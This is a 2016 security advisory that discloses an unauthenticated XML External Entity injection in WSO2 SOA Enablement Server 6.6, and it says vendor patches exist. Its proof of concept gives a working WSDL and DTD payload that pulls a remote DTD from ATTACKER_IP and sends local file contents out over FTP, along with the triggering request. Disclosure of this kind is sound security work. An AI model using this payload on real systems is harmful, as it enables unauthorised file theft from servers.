WSO2 SOA Enablement Server XML External Entity Injection

2016-07-13T00:00:00
ID PACKETSTORM:137887
Type packetstorm
Reporter Jakub Palaczynski
Modified 2016-07-13T00:00:00

Description

                                        
                                            `Title: WSO2 SOA Enablement Server - XML External Entity Injection  
Authors: Pawel Gocyla, Jakub Palaczynski  
Date: 08. June 2016  
  
Affected Software:  
==================  
WSO2 SOA Enablement Server for Java/6.6 build SSJ-6.6-20090827-1616  
Probably other versions are also vulnerable.  
  
  
Vulnerability:  
**************  
  
XML External Entity Injection:  
==============================  
  
It must be noted that this vulnerability is exploitable without  
authentication.  
  
Proof of Concept:  
1. An attacker sets up web server that serves two files (wsdl.txt and  
file.dtd):  
wsdl.txt:  
<?xml version="1.0" encoding="utf-8"?>  
<!DOCTYPE m [ <!ENTITY % remote SYSTEM "http://ATTACKER_IP/file.dtd  
">%remote;%int;%trick;]>  
file.dtd:  
<!ENTITY % payl SYSTEM "file:///C:/">  
<!ENTITY % int "<!ENTITY % trick SYSTEM 'ftp://ATTACKER_IP/%payl;'>">  
  
2. An attacker sets up FTP server that logs every command executed on the  
server.  
  
3. An attacker sends request that triggers vulnerability:  
https://WSO2SOA_IP:6443/invocationConsole?p.wsdlUrl=http://attacker_ip/wsdl.txt  
  
  
FIX:  
====  
  
Patches were already released by the vendor.  
  
Contact:  
========  
  
pawellgocyla[at]gmail[dot]com  
jakub.palaczynski[at]gmail[dot]com  
  
  
`